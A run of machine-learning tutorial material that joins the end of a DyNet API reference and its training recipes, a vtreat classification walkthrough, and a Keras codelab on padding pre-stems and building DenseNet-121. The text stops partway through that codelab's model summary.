dy.noise(e1, stddev) # add noise to each element, drawn from a Gaussian with standard deviation stddev
dy.dropout(e1, p) # apply dropout with probability p
# functions over lists of expressions
e = dy.esum([e1, e2, ...]) # sum
e = dy.average([e1, e2, ...]) # average
e = dy.concatenate_cols([e1, e2, ...]) # e1, e2,.. are column vectors. return a matrix. (similar to np.hstack([e1,e2,...]))
e = dy.concatenate([e1, e2, ...]) # concatenate
e = dy.affine_transform([e0,e1,e2, ...]) # e = e0 + ((e1*e2) + (e3*e4) ...)
## Loss functions
e = dy.squared_distance(e1, e2)
e = dy.l1_distance(e1, e2)
e = dy.huber_distance(e1, e2, c=1.345)
# e1 must be a scalar that is a value between 0 and 1
# e2 (ty) must be a scalar that is a value between 0 and 1
# e = ty * log(e1) + (1 - ty) * log(1 - e1)
e = dy.binary_log_loss(e1, e2)
# e1 is row vector or scalar
# e2 is row vector or scalar
# m is number
# e = max(0, m - (e1 - e2))
e = dy.pairwise_rank_loss(e1, e2, m=1.0)
# Convolutions
# e1 \in R^{d x s} (input)
# e2 \in R^{d x m} (filter)
e = dy.conv1d_narrow(e1, e2) # e = e1 *conv e2
e = dy.conv1d_wide(e1, e2) # e = e1 *conv e2
e = dy.filter1d_narrow(e1, e2) # e = e1 *filter e2
e = dy.kmax_pooling(e1, k) # kmax-pooling operation (Kalchbrenner et al 2014)
e = dy.kmh_ngram(e1, k) #
e = dy.fold_rows(e1, nrows=2) #
```
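Since the listing above is DyNet-specific, here is a plain-numpy reference for the semantics of a few of those ops (`cmult`, `softmax`, and `affine_transform`), treating vectors as 1-D arrays:

```python
import numpy as np

e1 = np.array([1.0, 2.0, 3.0])
e2 = np.array([0.5, 0.5, 1.0])

cmult = e1 * e2                       # dy.cmult: component-wise multiply

z = e1 - e1.max()                     # dy.softmax, numerically stabilized
softmax = np.exp(z) / np.exp(z).sum()

# dy.affine_transform([e0, e1, e2, e3, e4]) computes e0 + e1@e2 + e3@e4
b = np.array([0.1, 0.2])
W1 = np.ones((2, 3)); x1 = e1
W2 = np.eye(2);       x2 = np.array([1.0, -1.0])
affine = b + W1 @ x1 + W2 @ x2
print(cmult, softmax.sum(), affine)
```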
### Recipe
```
import dynet as dy
import numpy as np
# create parameter collection
m = dy.ParameterCollection()
# add parameters to parameter collection
pW = m.add_parameters((10,30))
pB = m.add_parameters(10)
lookup = m.add_lookup_parameters((500, 10))
print "added"
# create trainer
trainer = dy.SimpleSGDTrainer(m)
# Regularization is set via the --dynet-l2 commandline flag.
# Learning rate parameters can be passed to the trainer:
# alpha = 0.1 # learning rate
# trainer = dy.SimpleSGDTrainer(m, e0=alpha)
# function for graph creation
def create_network_return_loss(inputs, expected_output):
    """
    inputs is a list of numbers
    """
    dy.renew_cg()
    W = dy.parameter(pW)  # from parameters to expressions
    b = dy.parameter(pB)
    emb_vectors = [lookup[i] for i in inputs]
    net_input = dy.concatenate(emb_vectors)
    net_output = dy.softmax((W * net_input) + b)
    loss = -dy.log(dy.pick(net_output, expected_output))
    return loss
# function for prediction
def create_network_return_best(inputs):
    """
    inputs is a list of numbers
    """
    dy.renew_cg()
    W = dy.parameter(pW)
    b = dy.parameter(pB)
    emb_vectors = [lookup[i] for i in inputs]
    net_input = dy.concatenate(emb_vectors)
    net_output = dy.softmax((W * net_input) + b)
    return np.argmax(net_output.npvalue())
# train network
for epoch in range(5):
    for inp, lbl in (([1, 2, 3], 1), ([3, 2, 4], 2)):
        print(inp, lbl)
        loss = create_network_return_loss(inp, lbl)
        print(loss.value())  # need to run loss.value() for the forward prop
        loss.backward()
        trainer.update()
print(create_network_return_best([1, 2, 3]))
```
### Recipe (using classes)
```
import dynet as dy
import numpy as np
# create parameter collection
m = dy.ParameterCollection()
# create a class encapsulating the network
class OurNetwork(object):
    # The init method adds parameters to the parameter collection.
    def __init__(self, pc):
        self.pW = pc.add_parameters((10, 30))
        self.pB = pc.add_parameters(10)
        self.lookup = pc.add_lookup_parameters((500, 10))

    # the __call__ method applies the network to an input
    def __call__(self, inputs):
        W = dy.parameter(self.pW)
        b = dy.parameter(self.pB)
        lookup = self.lookup
        emb_vectors = [lookup[i] for i in inputs]
        net_input = dy.concatenate(emb_vectors)
        net_output = dy.softmax((W * net_input) + b)
        return net_output

    def create_network_return_loss(self, inputs, expected_output):
        dy.renew_cg()
        out = self(inputs)
        loss = -dy.log(dy.pick(out, expected_output))
        return loss

    def create_network_return_best(self, inputs):
        dy.renew_cg()
        out = self(inputs)
        return np.argmax(out.npvalue())
# create network
network = OurNetwork(m)
# create trainer
trainer = dy.SimpleSGDTrainer(m)
# train network
for epoch in range(5):
    for inp, lbl in (([1, 2, 3], 1), ([3, 2, 4], 2)):
        print(inp, lbl)
        loss = network.create_network_return_loss(inp, lbl)
        print(loss.value())  # need to run loss.value() for the forward prop
        loss.backward()
        trainer.update()
print()
print(network.create_network_return_best([1, 2, 3]))
```
### or, alternatively, have the training outside of the network class
```
# create network
network = OurNetwork(m)
# create trainer
trainer = dy.SimpleSGDTrainer(m)
# train network
for epoch in range(5):
    for inp, lbl in (([1, 2, 3], 1), ([3, 2, 4], 2)):
        print(inp, lbl)
        dy.renew_cg()
        out = network(inp)
        loss = -dy.log(dy.pick(out, lbl))
        print(loss.value())  # need to run loss.value() for the forward prop
        loss.backward()
        trainer.update()
print()
print(np.argmax(network([1, 2, 3]).npvalue()))
```
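For reference, the forward computation shared by all three recipes (lookup, concatenate, affine transform, softmax) can be re-expressed in plain numpy with randomly initialized parameters:

```python
import numpy as np

rng = np.random.default_rng(0)
W = rng.normal(scale=0.1, size=(10, 30))        # like pW: 10 outputs, 30 inputs
b = rng.normal(scale=0.1, size=10)              # like pB
lookup = rng.normal(scale=0.1, size=(500, 10))  # like the lookup table

def forward(inputs):
    net_input = np.concatenate([lookup[i] for i in inputs])  # 3 x 10 -> 30
    z = W @ net_input + b
    ez = np.exp(z - z.max())
    return ez / ez.sum()                        # softmax over the 10 classes

probs = forward([1, 2, 3])
print(probs.shape, probs.sum())
```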
# Using [vtreat](https://github.com/WinVector/pyvtreat) with Classification Problems
Nina Zumel and John Mount
November 2019
Note: this is a description of the [`Python` version of `vtreat`](https://github.com/WinVector/pyvtreat), the same example for the [`R` version of `vtreat`](https://github.com/WinVector/vtreat) can be found [here](https://github.com/WinVector/vtreat/blob/master/Examples/Classification/Classification.md).
## Preliminaries
Load modules/packages.
```
import pkg_resources
import pandas
import numpy
import numpy.random
import seaborn
import matplotlib.pyplot as plt
import vtreat
import vtreat.util
import wvpy.util
numpy.random.seed(2019)
```
Generate example data.
* `y` is a noisy sinusoidal function of the variable `x`
* `yc` is the output to be predicted: whether `y` is greater than 0.5.
* Input `xc` is a categorical variable that represents a discretization of `y`, along with some `NaN`s
* Input `x2` is a pure noise variable with no relationship to the output
```
def make_data(nrows):
    d = pandas.DataFrame({'x': 5*numpy.random.normal(size=nrows)})
    d['y'] = numpy.sin(d['x']) + 0.1*numpy.random.normal(size=nrows)
    d.loc[numpy.arange(3, 10), 'x'] = numpy.nan  # introduce a nan level
    d['xc'] = ['level_' + str(5*numpy.round(yi/5, 1)) for yi in d['y']]
    d['x2'] = numpy.random.normal(size=nrows)
    d.loc[d['xc']=='level_-1.0', 'xc'] = numpy.nan  # introduce a nan level
    d['yc'] = d['y']>0.5
    return d
d = make_data(500)
d.head()
outcome_name = 'yc' # outcome variable / column
outcome_target = True # value we consider positive
```
### Some quick data exploration
Check how many levels `xc` has, and their distribution (including `NaN`)
```
d['xc'].unique()
d['xc'].value_counts(dropna=False)
```
Find the prevalence of `yc == True` (our chosen notion of "positive").
```
numpy.mean(d[outcome_name] == outcome_target)
```
Plot of `yc` versus `x`.
```
seaborn.lineplot(x='x', y='yc', data=d)
```
## Build a transform appropriate for classification problems.
Now that we have the data, we want to treat it prior to modeling: we want training data where all the input variables are numeric and have no missing values or `NaN`s.
First create the data treatment transform object, in this case a treatment for a binomial classification problem.
```
transform = vtreat.BinomialOutcomeTreatment(
outcome_name=outcome_name, # outcome variable
outcome_target=outcome_target, # outcome of interest
cols_to_copy=['y'], # columns to "carry along" but not treat as input variables
)
```
Use the training data `d` to fit the transform and return a treated training set: completely numeric, with no missing values.
Note that for the training data `d`: `transform.fit_transform()` is **not** the same as `transform.fit().transform()`; the second call can lead to nested model bias in some situations, and is **not** recommended.
For other, later data not seen during transform design, `transform.transform(o)` is the appropriate step.
```
d_prepared = transform.fit_transform(d, d['yc'])
```
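To see why `fit_transform()` differs from `fit().transform()` on the training data, here is a toy pandas illustration (our own, not vtreat itself) of cross-fitted encoding: a naive same-data impact code lets each row "see" its own outcome, while a cross-fitted code encodes each row using only the other folds:

```python
import numpy as np
import pandas as pd

rng = np.random.default_rng(0)
df = pd.DataFrame({"xc": rng.choice(list("abc"), size=30),
                   "y": rng.integers(0, 2, size=30).astype(float)})

# naive encoding: each level replaced by its outcome mean on the SAME rows
naive = df.groupby("xc")["y"].transform("mean")

# cross-fitted encoding: each row is encoded using only the other folds
fold = np.arange(len(df)) % 3
crossed = np.empty(len(df))
for f in range(3):
    means = df[fold != f].groupby("xc")["y"].mean()
    crossed[fold == f] = (df.loc[fold == f, "xc"].map(means)
                          .fillna(df["y"].mean()).to_numpy())
print(crossed[:5])
```

A downstream model fit on `naive` sees a partially leaked copy of the outcome; the cross-fitted column does not have that problem.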
Now examine the score frame, which gives information about each new variable, including its type, which original variable it is derived from, its (cross-validated) correlation with the outcome, and its (cross-validated) significance as a one-variable linear model for the outcome.
```
transform.score_frame_
```
Note that the variable `xc` has been converted to multiple variables:
* an indicator variable for each possible level (`xc_lev_level_*`)
* the value of a (cross-validated) one-variable model for `yc` as a function of `xc` (`xc_logit_code`)
* a variable that returns how prevalent this particular value of `xc` is in the training data (`xc_prevalence_code`)
* variables indicating when `xc` or `x` was `NaN` in the original data (`xc_is_bad`, `x_is_bad`)
Any or all of these new variables are available for downstream modeling. `x` doesn't show as exciting a significance as `xc`, as we are only checking linear relations, and `x` is related to `y` in a very non-linear way.
The `recommended` column indicates which variables are non constant (`has_range` == True) and have a significance value smaller than `default_threshold`. See the section *Deriving the Default Thresholds* below for the reasoning behind the default thresholds. Recommended columns are intended as advice about which variables appear to be most likely to be useful in a downstream model. This advice attempts to be conservative, to reduce the possibility of mistakenly eliminating variables that may in fact be useful (although, obviously, it can still mistakenly eliminate variables that have a real but non-linear relationship to the output, as is the case with `x`, in our example).
Let's look at the variables that are and are not recommended:
```
# recommended variables
transform.score_frame_.loc[transform.score_frame_['recommended'], ['variable']]
# not recommended variables
transform.score_frame_.loc[~transform.score_frame_['recommended'], ['variable']]
```
Notice that `d_prepared` only includes recommended variables (along with `y` and `yc`):
```
d_prepared.head()
```
This is `vtreat`'s default behavior; to include all variables in the prepared data, set the parameter `filter_to_recommended` to False, as we show later, in the *Parameters for `BinomialOutcomeTreatment`* section below.
## A Closer Look at `logit_code` variables
Variables of type `logit_code` are the outputs of a one-variable hierarchical logistic regression of a categorical variable (in our example, `xc`) against the centered output on the (cross-validated) treated training data.
Let's see whether `xc_logit_code` makes a good one-variable model for `yc`. It has a large AUC:
```
wvpy.util.plot_roc(prediction=d_prepared['xc_logit_code'],
istrue=d_prepared['yc'],
title = 'performance of xc_logit_code variable')
```
This indicates that `xc_logit_code` is strongly predictive of the outcome. Negative values of `xc_logit_code` correspond strongly to negative outcomes, and positive values correspond strongly to positive outcomes.
```
wvpy.util.dual_density_plot(probs=d_prepared['xc_logit_code'],
istrue=d_prepared['yc'])
```
The values of `xc_logit_code` are in "link space". We can often visualize the relationship a little better by converting the logistic score to a probability.
```
from scipy.special import expit # sigmoid
from scipy.special import logit
offset = logit(numpy.mean(d_prepared.yc))
wvpy.util.dual_density_plot(probs=expit(d_prepared['xc_logit_code'] + offset),
istrue=d_prepared['yc'])
```
Variables of type `logit_code` are useful when dealing with categorical variables with a very large number of possible levels. For example, a categorical variable with 10,000 possible values potentially converts to 10,000 indicator variables, which may be unwieldy for some modeling methods. Using a single numerical variable of type `logit_code` may be a preferable alternative.
## Using the Prepared Data in a Model
Of course, what we really want to do with the prepared training data is to fit a model jointly with all the (recommended) variables.
Let's try fitting a logistic regression model to `d_prepared`.
```
import sklearn.linear_model
import seaborn
not_variables = ['y', 'yc', 'prediction']
model_vars = [v for v in d_prepared.columns if v not in set(not_variables)]
fitter = sklearn.linear_model.LogisticRegression()
fitter.fit(d_prepared[model_vars], d_prepared['yc'])
# now predict
d_prepared['prediction'] = fitter.predict_proba(d_prepared[model_vars])[:, 1]
# look at the ROC curve (on the training data)
wvpy.util.plot_roc(prediction=d_prepared['prediction'],
istrue=d_prepared['yc'],
title = 'Performance of logistic regression model on training data')
```
Now apply the model to new data.
```
# create the new data
dtest = make_data(450)
# prepare the new data with vtreat
dtest_prepared = transform.transform(dtest)
# apply the model to the prepared data
dtest_prepared['prediction'] = fitter.predict_proba(dtest_prepared[model_vars])[:, 1]
wvpy.util.plot_roc(prediction=dtest_prepared['prediction'],
istrue=dtest_prepared['yc'],
title = 'Performance of logistic regression model on test data')
```
## Parameters for `BinomialOutcomeTreatment`
We've tried to set the defaults for all parameters so that `vtreat` is usable out of the box for most applications.
```
vtreat.vtreat_parameters()
```
**use_hierarchical_estimate**: When True, uses hierarchical smoothing when estimating `logit_code` variables; when False, uses unsmoothed logistic regression.
**coders**: The types of synthetic variables that `vtreat` will (potentially) produce. See *Types of prepared variables* below.
**filter_to_recommended**: When True, prepared data only includes variables marked as "recommended" in score frame. When False, prepared data includes all variables. See the Example below.
**indicator_min_fraction**: For categorical variables, indicator variables (type `indicator_code`) are only produced for levels that are present at least `indicator_min_fraction` of the time. A consequence of this is that 1/`indicator_min_fraction` is the maximum number of indicators that will be produced for a given categorical variable. To make sure that *all* possible indicator variables are produced, set `indicator_min_fraction = 0`
**cross_validation_plan**: The cross validation method used by `vtreat`. Most people won't have to change this.
**cross_validation_k**: The number of folds to use for cross-validation
**user_transforms**: For passing in user-defined transforms for custom data preparation. Won't be needed in most situations, but see [here](https://github.com/WinVector/pyvtreat/blob/master/Examples/UserCoders/UserCoders.ipynb) for an example of applying a GAM transform to input variables.
**sparse_indicators**: When True, use a (Pandas) sparse representation for indicator variables. This representation is compatible with `sklearn`; however, it may not be compatible with other modeling packages. When False, use a dense representation.
**missingness_imputation**: The function or value that `vtreat` uses to impute or "fill in" missing numerical values. The default is `numpy.mean()`. To change the imputation function or use different functions/values for different columns, see the [Imputation example](https://github.com/WinVector/pyvtreat/blob/master/Examples/Imputation/Imputation.ipynb).
### Example: Use all variables to model, not just recommended
```
transform_all = vtreat.BinomialOutcomeTreatment(
outcome_name='yc', # outcome variable
outcome_target=True, # outcome of interest
cols_to_copy=['y'], # columns to "carry along" but not treat as input variables
params = vtreat.vtreat_parameters({
'filter_to_recommended': False
})
)
transform_all.fit_transform(d, d['yc']).columns
transform_all.score_frame_
```
Note that the prepared data produced by `fit_transform()` includes all the variables, including those that were not marked as "recommended".
## Types of prepared variables
**clean_copy**: Produced from numerical variables: a clean numerical variable with no `NaNs` or missing values
**indicator_code**: Produced from categorical variables, one for each (common) level: for each level of the variable, indicates if that level was "on"
**prevalence_code**: Produced from categorical variables: indicates how often each level of the variable was "on"
**logit_code**: Produced from categorical variables: score from a one-dimensional model of the centered output as a function of the variable
**missing_indicator**: Produced for both numerical and categorical variables: an indicator variable that marks when the original variable was missing or `NaN`
**deviation_code**: not used by `BinomialOutcomeTreatment`
**impact_code**: not used by `BinomialOutcomeTreatment`
### Example: Produce only a subset of variable types
In this example, suppose you only want to use indicators and continuous variables in your model;
in other words, you only want to use variables of types (`clean_copy`, `missing_indicator`, and `indicator_code`), and no `logit_code` or `prevalence_code` variables.
```
transform_thin = vtreat.BinomialOutcomeTreatment(
outcome_name='yc', # outcome variable
outcome_target=True, # outcome of interest
cols_to_copy=['y'], # columns to "carry along" but not treat as input variables
params = vtreat.vtreat_parameters({
'filter_to_recommended': False,
'coders': {'clean_copy',
'missing_indicator',
'indicator_code',
}
})
)
transform_thin.fit_transform(d, d['yc']).head()
transform_thin.score_frame_
```
## Deriving the Default Thresholds
While machine learning algorithms are generally tolerant to a reasonable number of irrelevant or noise variables, too many irrelevant variables can lead to serious overfit; see [this article](http://www.win-vector.com/blog/2014/02/bad-bayes-an-example-of-why-you-need-hold-out-testing/) for an extreme example, one we call "Bad Bayes". The default threshold is an attempt to eliminate obviously irrelevant variables early.
Imagine that you have a pure noise dataset, where none of the *n* inputs are related to the output. If you treat each variable as a one-variable model for the output, and look at the significances of each model, these significance-values will be uniformly distributed in the range [0:1]. You want to pick a weakest possible significance threshold that eliminates as many noise variables as possible. A moment's thought should convince you that a threshold of *1/n* allows only one variable through, in expectation.
This leads to the general-case heuristic that a significance threshold of *1/n* on your variables should allow only one irrelevant variable through, in expectation (along with all the relevant variables). Hence, *1/n* used to be our recommended threshold, when we developed the R version of `vtreat`.
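That expectation is easy to check with a quick simulation (our own check, not part of `vtreat`):

```python
import numpy as np

rng = np.random.default_rng(0)
n, trials = 100, 10_000
significances = rng.uniform(size=(trials, n))      # n pure-noise variables
passed = (significances < 1.0 / n).sum(axis=1)     # variables under threshold 1/n
print(passed.mean())  # close to 1.0 in expectation
```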
We noticed, however, that this biases the filtering against numerical variables, since there are at most two derived variables (of types *clean_copy* and *missing_indicator*) for every numerical variable in the original data. Categorical variables, on the other hand, are expanded to many derived variables: several indicators (one for every common level), plus a *logit_code* and a *prevalence_code*. So we now reweight the thresholds.
Suppose you have a (treated) data set with *ntreat* different types of `vtreat` variables (`clean_copy`, `indicator_code`, etc).
There are *nT* variables of type *T*. Then the default threshold for all the variables of type *T* is *1/(ntreat · nT)*. This reweighting helps to reduce the bias against any particular type of variable. The heuristic is still that the set of recommended variables will allow at most one noise variable into the set of candidate variables.
As noted above, because `vtreat` estimates variable significances using linear methods by default, some variables with a non-linear relationship to the output may fail to pass the threshold. Setting the `filter_to_recommended` parameter to False will keep all derived variables in the treated frame, for the data scientist to filter (or not) as they will.
## Conclusion
In all cases (classification, regression, unsupervised, and multinomial classification) the intent is that `vtreat` transforms are essentially one-liners.
The preparation commands are organized as follows:
* **Regression**: [`Python` regression example](https://github.com/WinVector/pyvtreat/blob/master/Examples/Regression/Regression.md), [`R` regression example, fit/prepare interface](https://github.com/WinVector/vtreat/blob/master/Examples/Regression/Regression_FP.md), [`R` regression example, design/prepare/experiment interface](https://github.com/WinVector/vtreat/blob/master/Examples/Regression/Regression.md).
* **Classification**: [`Python` classification example](https://github.com/WinVector/pyvtreat/blob/master/Examples/Classification/Classification.md), [`R` classification example, fit/prepare interface](https://github.com/WinVector/vtreat/blob/master/Examples/Classification/Classification_FP.md), [`R` classification example, design/prepare/experiment interface](https://github.com/WinVector/vtreat/blob/master/Examples/Classification/Classification.md).
* **Unsupervised tasks**: [`Python` unsupervised example](https://github.com/WinVector/pyvtreat/blob/master/Examples/Unsupervised/Unsupervised.md), [`R` unsupervised example, fit/prepare interface](https://github.com/WinVector/vtreat/blob/master/Examples/Unsupervised/Unsupervised_FP.md), [`R` unsupervised example, design/prepare/experiment interface](https://github.com/WinVector/vtreat/blob/master/Examples/Unsupervised/Unsupervised.md).
* **Multinomial classification**: [`Python` multinomial classification example](https://github.com/WinVector/pyvtreat/blob/master/Examples/Multinomial/MultinomialExample.md), [`R` multinomial classification example, fit/prepare interface](https://github.com/WinVector/vtreat/blob/master/Examples/Multinomial/MultinomialExample_FP.md), [`R` multinomial classification example, design/prepare/experiment interface](https://github.com/WinVector/vtreat/blob/master/Examples/Multinomial/MultinomialExample.md).
Some common `vtreat` capabilities are documented here:
* **Score frame**: [score_frame_](https://github.com/WinVector/pyvtreat/blob/master/Examples/ScoreFrame/ScoreFrame.md), using the `score_frame_` information.
* **Cross-validation**: [Customized Cross Plans](https://github.com/WinVector/pyvtreat/blob/master/Examples/CustomizedCrossPlan/CustomizedCrossPlan.md), controlling the cross-validation plan.
These current revisions of the examples are designed to be small, yet complete. So as a set they have some overlap, but the user can rely mostly on a single example for a single task type.
```
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
```
<a target="_blank" href="https://colab.research.google.com/github/GoogleCloudPlatform/keras-idiomatic-programmer/blob/master/workshops/Advanced_Convolutional_Neural_Networks/Idiomatic%20Programmer%20-%20handbook%201%20-%20Codelab%204.ipynb">
<img src="https://www.tensorflow.org/images/colab_logo_32px.png" />Run in Google Colab</a>
# Idiomatic Programmer Code Labs
## Code Labs #4 - Get Familiar with Advanced CNN Designs
## Prerequisites:
1. Familiar with Python
2. Completed Handbook 1/Part 4: Advanced Convolutional Neural Networks
## Objectives:
1. Architecture Changes - Pre-stems
2. Dense connections across sublayers in DenseNet
3. Xception Redesigned Macro-Architecture for CNN
## Pre-Stems Groups for Handling Different Input Sizes
Let's create a pre-stem to handle an input size different than what the neural network was designed for.
We will use these approaches:
1. Calculate the difference in size between the expected input and the actual input
   (here we assume the actual size is less than the expected size).
   A. Expected = (230, 230, 3)
   B. Actual = (224, 224, 3)
2. Pad the inputs to fit the expected size.
You fill in the blanks (replace the ??), make sure it passes the Python interpreter, and then verify its correctness with the summary output.
You will need to:
1. Set the padding of the image prior to the first convolution.
```
from keras import layers, Input
# Note: this is not the input shape expected by the stem (which is (230, 230, 3))
inputs = Input(shape=(224, 224, 3))
# Add a pre-stem and pad (224, 224, 3) to (230, 230, 3)
# HINT: Since the pad is on both sides (left/right, top/bottom) you want to divide the
# difference by two (half goes to the left, half goes to the right, etc)
inputs = layers.ZeroPadding2D(??)(inputs)
# This stem's expected shape is (230, 230, 3)
x = layers.Conv2D(64, (7, 7), strides=(2,2))(inputs)
x = layers.BatchNormalization()(x)
x = layers.ReLU()(x)
```
## Verify that actual is padded to expected:
You should get the following output on the shape of the inputs and outputs
```
inputs (?, 230, 230, 3)
outputs (?, 112, 112, 64)
```
```
# this will output: (?, 230, 230, 3)
print("inputs", inputs.shape)
# this will output: (?, 112, 112, 64)
print("outputs", x.shape)
```
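As a sanity check on the pad arithmetic above, the per-side padding can be computed directly. This is a minimal sketch (not part of the original codelab) using plain Python rather than Keras:

```python
# Per-side symmetric padding needed to grow the actual input to the expected size
expected_hw = (230, 230)   # spatial shape the stem was designed for
actual_hw = (224, 224)     # spatial shape we actually have
pads = tuple((e - a) // 2 for e, a in zip(expected_hw, actual_hw))
print(pads)  # (3, 3): pad 3 pixels on each side of height and width
```

The result is what `ZeroPadding2D` expects: one pad value per spatial dimension, applied symmetrically to both sides.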
## DenseNet as Function API
Let's create a DenseNet-121:
We will use these approaches:
1. Add a pre-stem step of padding by 1 pixel so a 230x230x3 input results in 7x7
feature maps at the global average (bottleneck) layer.
2. Use average pooling (subsampling) in transition blocks.
3. Accumulate feature maps through residual blocks by concatenating the input to the
output, and making that the new output.
4. Use compression to reduce feature map sizes between dense blocks.
You will need to:
1. Set the padding in the stem group.
2. Concatenate the input and output at each residual block.
3. Set the compression (reduction) of filters in the transition block.
4. Use average pooling in transition block.
```
from keras import layers, Input, Model
def stem(inputs):
""" The Stem Convolution Group
inputs : input tensor
"""
# First large convolution for abstract features for input 230 x 230 and output
# 112 x 112
x = layers.Conv2D(64, (7, 7), strides=2)(inputs)
x = layers.BatchNormalization()(x)
x = layers.ReLU()(x)
# Add padding so when downsampling we fit shape 56 x 56
# Hint: we want to pad one pixel all around.
    x = layers.ZeroPadding2D(padding=(??, ??))(x)
x = layers.MaxPooling2D((3, 3), strides=2)(x)
return x
def dense_block(x, nblocks, nb_filters):
""" Construct a Dense Block
x : input layer
nblocks : number of residual blocks in dense block
nb_filters: number of filters in convolution layer in residual block
"""
# Construct a group of residual blocks
for _ in range(nblocks):
x = residual_block(x, nb_filters)
return x
def residual_block(x, nb_filters):
""" Construct Residual Block
x : input layer
nb_filters: number of filters in convolution layer in residual block
"""
shortcut = x # remember input tensor into residual block
# Bottleneck convolution, expand filters by 4 (DenseNet-B)
x = layers.Conv2D(4 * nb_filters, (1, 1), strides=(1, 1))(x)
x = layers.BatchNormalization()(x)
x = layers.ReLU()(x)
# 3 x 3 convolution with padding=same to preserve same shape of feature maps
x = layers.Conv2D(nb_filters, (3, 3), strides=(1, 1), padding='same')(x)
x = layers.BatchNormalization()(x)
x = layers.ReLU()(x)
# Concatenate the input (identity) with the output of the residual block
# Concatenation (vs. merging) provides Feature Reuse between layers
# HINT: Use a list which includes the remembered input and the output from the residual block - which becomes the new output
x = layers.concatenate([??])
return x
def trans_block(x, reduce_by):
""" Construct a Transition Block
x : input layer
reduce_by: percentage of reduction of feature maps
"""
# Reduce (compression) the number of feature maps (DenseNet-C)
# shape[n] returns a class object. We use int() to cast it into the dimension
# size
# HINT: the compression is a percentage (~0.5) that was passed as a parameter to this function
nb_filters = int( int(x.shape[3]) * ?? )
# Bottleneck convolution
x = layers.Conv2D(nb_filters, (1, 1), strides=(1, 1))(x)
x = layers.BatchNormalization()(x)
x = layers.ReLU()(x)
# Use mean value (average) instead of max value sampling when pooling
# reduce by 75%
# HINT: instead of Max Pooling (downsampling) we use Average Pooling (subsampling)
x = layers.??Pooling2D((2, 2), strides=(2, 2))(x)
return x
inputs = Input(shape=(230, 230, 3))
# Create the Stem Convolution Group
x = stem(inputs)
# number of residual blocks in each dense block
blocks = [6, 12, 24, 16]
# pop off the list the last dense block
last = blocks.pop()
# amount to reduce feature maps by (compression) during transition blocks
reduce_by = 0.5
# number of filters in a convolution block within a residual block
nb_filters = 32
# Create the dense blocks and interceding transition blocks
for nblocks in blocks:
x = dense_block(x, nblocks, nb_filters)
x = trans_block(x, reduce_by)
# Add the last dense block w/o a following transition block
x = dense_block(x, last, nb_filters)
# Classifier
# Global Average Pooling will flatten the 7x7 feature maps into 1D feature maps
x = layers.GlobalAveragePooling2D()(x)
# Fully connected output layer (classification)
outputs = layers.Dense(1000, activation='softmax')(x)
model = Model(inputs, outputs)
```
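To see why concatenation and compression produce the channel counts in the summary, the bookkeeping can be traced with plain arithmetic. This sketch (an illustration, not part of the codelab solution) mirrors the block loop above for DenseNet-121 with growth rate 32 and 0.5 compression:

```python
# Channel bookkeeping for DenseNet-121: each residual block concatenates
# `growth_rate` new feature maps; each transition block halves the channels.
growth_rate = 32          # filters added by each residual block (k)
channels = 64             # channels leaving the stem
reduce_by = 0.5           # compression factor in each transition block
for nblocks in [6, 12, 24]:            # dense blocks followed by a transition
    channels += growth_rate * nblocks  # concatenation accumulates k per block
    channels = int(channels * reduce_by)
channels += growth_rate * 16           # last dense block has no transition
print(channels)  # 1024 channels entering global average pooling
```

This matches the standard DenseNet-121 bottleneck width of 1024 feature maps before the classifier.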
### Verify the model architecture using summary method
It should look like below:
```
Layer (type) Output Shape Param # Connected to
==================================================================================================
input_3 (InputLayer) (None, 230, 230, 3) 0
__________________________________________________________________________________________________
conv2d_241 (Conv2D) (None, 112, 112, 64) 9472 input_3[0][0]
__________________________________________________________________________________________________
batch_normalization_241 (BatchN (None, 112, 112, 64) 256 conv2d_241[0][0]
__________________________________________________________________________________________________
re_lu_241 (ReLU) (None, 112, 112, 64) 0 batch_normalization_241[0][0]
__________________________________________________________________________________________________
zero_padding2d_2 (ZeroPadding2D (None, 114, 114, 64) 0 re_lu_241[0][0]
__________________________________________________________________________________________________
max_pooling2d_3 (MaxPooling2D) (None, 56, 56, 64) 0 zero_padding2d_2[0][0]
__________________________________________________________________________________________________
conv2d_242 (Conv2D) (None, 56, 56, 128) 8320 max_pooling2d_3[0][0]
__________________________________________________________________________________________________
batch_normalization_242 (BatchN (None, 56, 56, 128) 512 conv2d_242[0][0]
__________________________________________________________________________________________________
re_lu_242 (ReLU) (None, 56, 56, 128) 0 batch_normalization_242[0][0]
__________________________________________________________________________________________________
conv2d_243 (Conv2D) (None, 56, 56, 32) 36896 re_lu_242[0][0]
__________________________________________________________________________________________________
batch_normalization_243 (BatchN (None, 56, 56, 32) 128 conv2d_243[0][0]
__________________________________________________________________________________________________
re_lu_243 (ReLU) (None, 56, 56, 32) 0 batch_normalization_243[0][0]
__________________________________________________________________________________________________
concatenate_117 (Concatenate) (None, 56, 56, 96) 0 max_pooling2d_3[0][0]
re_lu_243[0][0]
__________________________________________________________________________________________________
conv2d_244 (Conv2D) (None, 56, 56, 128) 12416 concatenate_117[0][0]
__________________________________________________________________________________________________
batch_normalization_244 (BatchN (None, 56, 56, 128) 512 conv2d_244[0][0]
__________________________________________________________________________________________________
re_lu_244 (ReLU) (None, 56, 56, 128) 0 batch_normalization_244[0][0]
__________________________________________________________________________________________________
conv2d_245 (Conv2D) (None, 56, 56, 32) 36896 re_lu_244[0][0]
__________________________________________________________________________________________________
batch_normalization_245 (BatchN (None, 56, 56, 32) 128 conv2d_245[0][0]
__________________________________________________________________________________________________
re_lu_245 (ReLU) (None, 56, 56, 32) 0 batch_normalization_245[0][0]
__________________________________________________________________________________________________
concatenate_118 (Concatenate) (None, 56, 56, 128) 0 concatenate_117[0][0]
re_lu_245[0][0]
__________________________________________________________________________________________________
conv2d_246 (Conv2D) (None, 56, 56, 128) 16512 concatenate_118[0][0]
__________________________________________________________________________________________________
batch_normalization_246 (BatchN (None, 56, 56, 128) 512 conv2d_246[0][0]
__________________________________________________________________________________________________
re_lu_246 (ReLU) (None, 56, 56, 128) 0 batch_normalization_246[0][0]
__________________________________________________________________________________________________
conv2d_247 (Conv2D) (None, 56, 56, 32) 36896 re_lu_246[0][0]
__________________________________________________________________________________________________
